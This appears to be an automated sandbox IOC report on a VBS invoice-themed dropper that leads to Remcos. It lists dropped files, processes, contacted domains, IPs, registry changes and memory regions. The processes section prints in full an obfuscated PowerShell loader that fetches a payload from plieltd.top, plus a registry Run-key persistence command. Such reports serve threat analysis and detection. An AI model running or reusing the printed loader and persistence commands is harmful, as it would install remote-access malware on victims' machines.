IOC Report
IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs

loading gif

Files

File Path
Type
Category
Malicious
IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55lrmmve.za3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipby20gf.uzl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whax01k5.z3n.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykmc5ace.1ez.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Clothesman.Vin
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs"
malicious
C:\Windows\System32\PING.EXE
ping gormezl_6777.6777.6777.677e
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
pelele.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
http://plieltd.top
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://plieltd.top/Tlles187.deployXR#l
unknown
https://plieltd.top
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://plieltd.top/Tlles187.deploy
172.67.155.139
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore6lBkq
unknown
https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin
172.67.155.139
https://aka.ms/pscore68
unknown
https://plieltd.top/Tlles187.deployP
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://plieltd.top/
unknown
https://github.com/Pester/Pester
unknown
https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin8p
unknown
There are 11 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pelele.duckdns.org
185.236.203.101
malicious
gormezl_6777.6777.6777.677e
unknown
malicious
plieltd.top
172.67.155.139

IPs

IP
Domain
Country
Malicious
185.236.203.101
pelele.duckdns.org
Romania
malicious
172.67.155.139
plieltd.top
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Skulptureredes
carlcorey
HKEY_CURRENT_USER\Environment
Hexokinase
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Sandsynliggrelsens
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7D00000
heap
page read and write
malicious
927D000
direct allocation
page execute and read and write
malicious
89E0000
direct allocation
page execute and read and write
malicious
5F76000
trusted library allocation
page read and write
malicious
2377E000
stack
page read and write
malicious
1CBABCF5000
trusted library allocation
page read and write
malicious
7CD0000
heap
page read and write
malicious
221C30DD000
heap
page read and write
2383C000
stack
page read and write
849E000
stack
page read and write
9180000
direct allocation
page execute and read and write
221C1020000
heap
page read and write
4C1E000
stack
page read and write
23528B30000
heap
page read and write
7E40000
heap
page read and write
1CB9A1D0000
trusted library allocation
page read and write
3010000
trusted library section
page read and write
1CB99EC0000
heap
page read and write
221C30E6000
heap
page read and write
221C3094000
heap
page read and write
221C2F17000
heap
page read and write
7BA0000
direct allocation
page read and write
2DB0000
heap
page readonly
221C30D3000
heap
page read and write
221C306E000
heap
page read and write
221C1192000
heap
page read and write
221C30CC000
heap
page read and write
7D00000
heap
page read and write
7FFD9A330000
trusted library allocation
page read and write
1CB9A210000
trusted library allocation
page read and write
221C309D000
heap
page read and write
87DA000
heap
page read and write
2B08000
heap
page read and write
221C2F41000
heap
page read and write
1CBB4279000
heap
page read and write
7DB0000
direct allocation
page read and write
1CB9A190000
heap
page readonly
2B87000
stack
page read and write
7950000
trusted library allocation
page read and write
23900000
heap
page read and write
7D90000
direct allocation
page read and write
7DF449F90000
trusted library allocation
page execute and read and write
717A000
stack
page read and write
7CF70FF000
stack
page read and write
7E46000
heap
page read and write
221C2F14000
heap
page read and write
874E000
stack
page read and write
221C30E6000
heap
page read and write
8A20000
direct allocation
page read and write
221C12A0000
heap
page read and write
221C2F39000
heap
page read and write
49CE000
stack
page read and write
95D000
stack
page read and write
221C11F2000
heap
page read and write
1CBB4500000
heap
page read and write
221C30A4000
heap
page read and write
8A70000
trusted library allocation
page execute and read and write
1CB9C81E000
trusted library allocation
page read and write
221C2F5D000
heap
page read and write
1CB9C119000
trusted library allocation
page read and write
4D5D000
remote allocation
page execute and read and write
7D80000
direct allocation
page read and write
7FFD9A201000
trusted library allocation
page read and write
1CB9C108000
trusted library allocation
page read and write
221C3078000
heap
page read and write
221C30DD000
heap
page read and write
2E2B000
heap
page read and write
7800000
trusted library allocation
page read and write
1CBB3FC0000
heap
page read and write
7B90000
direct allocation
page read and write
221C2F12000
heap
page read and write
2E3E000
stack
page read and write
A00000
heap
page read and write
2AFF000
stack
page read and write
7FFD9A060000
trusted library allocation
page read and write
5D41000
trusted library allocation
page read and write
7FFD9A3D0000
trusted library allocation
page read and write
1CB9A055000
heap
page read and write
7E00000
direct allocation
page read and write
8370000
trusted library allocation
page read and write
7FFD9A350000
trusted library allocation
page read and write
221C32C0000
heap
page read and write
7FFD9A240000
trusted library allocation
page execute and read and write
1CB9DA12000
trusted library allocation
page read and write
221C2F41000
heap
page read and write
7898000
trusted library allocation
page read and write
7FFD9A210000
trusted library allocation
page execute and read and write
1CB99FA0000
heap
page read and write
221C30D9000
heap
page read and write
23230000
heap
page read and write
4D41000
trusted library allocation
page read and write
315B000
heap
page read and write
7CF6AFE000
stack
page read and write
1CBB4074000
heap
page read and write
22D00000
direct allocation
page read and write
5DAE000
trusted library allocation
page read and write
1CB9C808000
trusted library allocation
page read and write
7C93000
heap
page read and write
221C2F11000
heap
page read and write
7FFD9A2E0000
trusted library allocation
page read and write
2C0E000
unkown
page read and write
221C2F11000
heap
page read and write
7FFD9A106000
trusted library allocation
page read and write
8A10000
direct allocation
page read and write
7FFD9A05D000
trusted library allocation
page execute and read and write
7FFD9A052000
trusted library allocation
page read and write
221C1159000
heap
page read and write
23470000
direct allocation
page read and write
7FFD9A290000
trusted library allocation
page read and write
70A0000
direct allocation
page read and write
238FE000
stack
page read and write
300F000
stack
page read and write
4A50000
trusted library allocation
page read and write
1CB9A11D000
heap
page read and write
2C10000
heap
page read and write
221C112A000
heap
page read and write
7CF6A7F000
stack
page read and write
78F0000
trusted library allocation
page read and write
78E0000
trusted library allocation
page read and write
7090000
direct allocation
page read and write
1CB9A2F0000
heap
page execute and read and write
27F0000
heap
page read and write
7CF6F79000
stack
page read and write
4D58FFF000
stack
page read and write
221C1220000
heap
page read and write
221C2F41000
heap
page read and write
221C2F39000
heap
page read and write
2E7E000
stack
page read and write
70E0000
direct allocation
page read and write
4D58AF9000
stack
page read and write
221C114B000
heap
page read and write
221C30D7000
heap
page read and write
234FE000
stack
page read and write
1CB9C5FC000
trusted library allocation
page read and write
7FFD9A054000
trusted library allocation
page read and write
9CF7000
trusted library allocation
page read and write
1CBB41F9000
heap
page read and write
221C30D3000
heap
page read and write
3044000
trusted library allocation
page read and write
7750000
heap
page execute and read and write
1CB9A040000
trusted library allocation
page read and write
301F000
stack
page read and write
74EE000
stack
page read and write
221C2F17000
heap
page read and write
77F0000
trusted library allocation
page execute and read and write
221C2F1A000
heap
page read and write
878C000
stack
page read and write
8350000
trusted library allocation
page execute and read and write
235F0000
remote allocation
page read and write
221C114B000
heap
page read and write
221C310D000
heap
page read and write
7FFD9A232000
trusted library allocation
page read and write
23528EA0000
heap
page read and write
221C2F3E000
heap
page read and write
8500000
trusted library allocation
page read and write
30AC000
heap
page read and write
A50000
heap
page read and write
1CB9A310000
heap
page read and write
4D590FF000
stack
page read and write
7FFD9A3E0000
trusted library allocation
page read and write
221C1338000
heap
page read and write
7D70000
direct allocation
page read and write
221C30F3000
heap
page read and write
1CBABF70000
trusted library allocation
page read and write
221C2F17000
heap
page read and write
3370000
heap
page read and write
1CBABCA1000
trusted library allocation
page read and write
3059000
trusted library allocation
page read and write
7890000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
4BDE000
stack
page read and write
2D7E000
stack
page read and write
7CF67FF000
stack
page read and write
1CB9A2C0000
heap
page execute and read and write
1CBB409C000
heap
page read and write
7FFD9A053000
trusted library allocation
page execute and read and write
221C2F18000
heap
page read and write
1CB9C7DE000
trusted library allocation
page read and write
2366F000
stack
page read and write
221C3093000
heap
page read and write
7FFD9A110000
trusted library allocation
page execute and read and write
70B0000
direct allocation
page read and write
7FFD9A220000
trusted library allocation
page execute and read and write
8A00000
direct allocation
page read and write
74AE000
stack
page read and write
7C40000
direct allocation
page read and write
221C30DD000
heap
page read and write
313D000
heap
page read and write
BA7D000
direct allocation
page execute and read and write
278D000
stack
page read and write
238BD000
stack
page read and write
7FFD9A2C0000
trusted library allocation
page read and write
23070000
heap
page read and write
230ED000
stack
page read and write
1CBB4089000
heap
page read and write
7900000
trusted library allocation
page read and write
7DC0000
direct allocation
page read and write
2362E000
stack
page read and write
7CF6DFE000
stack
page read and write
221C1190000
heap
page read and write
3070000
trusted library allocation
page read and write
8440000
trusted library allocation
page read and write
7FFD9A3B0000
trusted library allocation
page read and write
77C91FE000
unkown
page read and write
3075000
trusted library allocation
page execute and read and write
7C60000
heap
page read and write
87ED000
heap
page read and write
8520000
trusted library allocation
page read and write
7640000
heap
page read and write
30DF000
heap
page read and write
7E30000
direct allocation
page read and write
7FFD9A310000
trusted library allocation
page read and write
3198000
heap
page read and write
221C308E000
heap
